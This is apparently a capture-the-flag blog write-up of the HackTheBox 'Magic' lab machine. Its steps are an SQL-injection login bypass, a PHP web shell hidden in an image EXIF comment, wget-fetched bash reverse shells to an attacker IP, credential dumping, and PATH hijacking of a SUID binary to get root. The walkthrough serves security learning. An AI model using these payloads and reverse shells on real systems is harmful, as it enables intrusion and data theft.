---
title: "Hackthebox - Magic"
date: 2020-07-01T11:04:28+02:00
draft: false
toc: true
images:
tags:
- hackthebox
- walkthrough
- pentest
- medium
---

## Introduction

{{< image src="../../posts-img/hackthebox-magic/magic.png" alt="Magic" position="center" style="border-radius: 2px;" >}}

As you can see, the machine is on Linux with medium difficulty.

## Recon

First of all, let's start with a **nmap** scan to discover open ports on the machine.

```bash
$ nmap -A -T4 10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 12:11 CEST
Nmap scan report for 10.10.10.185
Host is up (0.020s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds
```

Ports 22 and 80 are open, apache run a web server named Magic Portofolio and the machine seems to be on Ubuntu.

There's the index web page.

{{< image src="../../posts-img/hackthebox-magic/webpage.png" alt="Web Index Page"
position="center" style="border-radius: 2px;" >}}

On the bottom left of the page we have this message:
> Please **Login**, to upload images.

Let's call your friend **gobuster** to find some directories/files on the web server.

```bash
$ gobuster dir --url http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/06/30 12:43:31 Starting gobuster
===============================================================
/index.php (Status: 200)
/login.php (Status: 200)
/assets (Status: 301)
/upload.php (Status: 302)
/images (Status: 301)
/logout.php (Status: 302)
Progress: 62628 / 220561 (28.39%)
```

When we try to go on the _upload.php_ page we are redirected to _login.php_.
We can bypass the login authentication with a simple SQL injection.

{{< image src="../../posts-img/hackthebox-magic/sqli.png" alt="SQL Injection" position="center" style="border-radius: 2px;" >}}

> Username: **admin' OR 1=1;--**
>
> Password: **whatever**

Great ! Now we are on the upload page.

{{< image src="../../posts-img/hackthebox-magic/upload.png" alt="Upload file" position="center" style="border-radius: 2px;" >}}

Let's try to upload a PHP reverse shell. But before uploading a real reverse shell, I wrote a simple PHP script to do some testing.


_**test.php**_
```php
<?php
	echo "Hello world";
?>
```

> test.php → Sorry, only JPG, JPEG & PNG files are allowed.
>
> test.pHp → Sorry, only JPG, JPEG & PNG files are allowed.
>
> test.png.php → Sorry, only JPG, JPEG & PNG files are allowed.
>
> test.png.php%00 → Sorry, only JPG, JPEG & PNG files are allowed.
>
> test.png → What are you trying to do there?

I also tried to change the MIME type of the file but it doesn't works.

In a nutshell, we can't upload file that are not valid PNG, JPEG or JPG images.

{{< image src="../../gif/batman.gif" alt="Interesting GIF" position="left" style="border-radius: 2px; max-width: 300px;" >}}

After looking around on the web, I found this [article](https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass).

> PHP getimagesize()
>
> For file uploads which validate image size using php getimagesize(), it may be possible to execute shellcode by inserting it into the Comment attribute of Image properties and saving it as file.jpg.php.

Let's try it on a real image.

```bash
$ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); echo "</pre>"; ?>' payload.php.png
$ exiftool payload.php.png
ExifTool Version Number         : 12.00
File Name                       : payload.php.png
File Size                       : 30 kB
[...]
Comment                         : <?php echo "<pre>"; system($_GET[cmd]); echo "</pre>"; ?>
```

Ok now the image has been uploaded at _http://10.10.10.185/images/uploads/payload.php.png_.

Let's try to run a command.

{{< image src="../../posts-img/hackthebox-magic/payload.png" alt="Payload" position="center" style="border-radius: 2px;" >}}

It works ! Now let's create a real reverse shell.

```bash
xanhacks@blog$ cat revshell.sh
#!/usr/bin/env bash
bash -i >& /dev/tcp/10.10.14.133/9001 0>&1
xanhacks@blog$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
Then go to:

> http://10.10.10.185/images/uploads/payload.php.png?cmd=**wget+10.10.14.133:8000/revshell.sh**
>
> http://10.10.10.185/images/uploads/payload.php.png?cmd=**bash+revshell.sh**

Here we go, we have a nice reverse shell !

## Privilege escalation (user)

```bash
www-data@ubuntu:/var/www/Magic$ ls
db.php5
index.php
login.php
[...]
www-data@ubuntu:/var/www/Magic$ cat db.php5
[...]
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
[...]
```

Now that we have some credentials, let's try to use them.

_my machine_
```bash
xanhacks@blog$ ssh theseus@10.10.10.185
theseus@10.10.10.185: Permission denied (publickey).
```

_victim machine_
```bash
www-data@ubuntu:/var/www/Magic$ su theseus
Password: iamkingtheseus

su: Authentication failure
```

Not working :( Let's try to view the database.

```bash
www-data@ubuntu:/var/www/Magic$ mysql -u theseus -p
bash: mysql: command not found
www-data@ubuntu:/var/www/Magic$ mysqldump -A -u theseus -p
Enter password: iamkingtheseus

-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
[...]
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
[...]
-- Dump completed on 2020-06-30  8:17:57
www-data@ubuntu:/var/www/Magic$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic$ su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$
```

Yes !! We are the user **theseus**, we can now read the user flag.

```bash
theseus@ubuntu:~$ cat user.txt
7a17e72f84cac962303dd21eedba8319
```

## Privilege escalation (root)

Let's add our ssh key to have a nice shell.

```bash
xanhacks@blog$ ssh-keygen -t rsa
[...]

theseus@ubuntu:~$ echo "PUBKEY" >> ~/.ssh/authorized_keys

xanhacks@blog$ ssh theseus@10.10.10.185 -i id_rsa
Last login ...
theseus@ubuntu:~$
```

After looking around on the machine, we can see that there is a weird SUID binary.

```bash
theseus@ubuntu:/tmp$ find / -user root -type f -perm /4000 2>/dev/null
/bin/sysinfo
[...]
theseus@ubuntu:/tmp$ ls -al /bin
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
[...]
theseus@ubuntu:/tmp$ strace /bin/sysinfo
setuid(0)                                                               = -1
setgid(0)                                                               = -1
[...]
popen("lshw -short", "r")                                               = 0x555e05a7c280
[...]
popen("fdisk -l", "r")                                                  = 0x555e05a7c280
[...]
popen("cat /proc/cpuinfo", "r")                                         = 0x555e05a7c280
[...]
popen("free -h", "r")                                                   = 0x555e05a7c280
[...]
+++ exited (status 0) +++
```

This binary run 4 commands without using the absolute path. This can be exploited by altering the PATH variable.

We can overwrite one of the 4 commands and replace it by our command that, for example, contains a bash reverse shell. Let's overwrite the first command: **lshw**.

```bash
theseus@ubuntu:/tmp$ PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ export PATH
theseus@ubuntu:/tmp$ vi lshw
#!/usr/bin/env bash
bash -i >& /dev/tcp/10.10.14.133/1337 0>&1
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
[Hanging ...]
```

```bash
xanhacks@blog$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.185] 42188
root@ubuntu:/tmp$
root@ubuntu:/tmp$ cd /root
root@ubuntu:/root$ cat root.txt
d801ab385113ddc4a110a32266cbfd75
```

And we got the root flag !

{{< image src="../../gif/holdmycomputer.gif" alt="Victory GIF" position="left" style="border-radius: 2px; max-width: 350px;" >}}
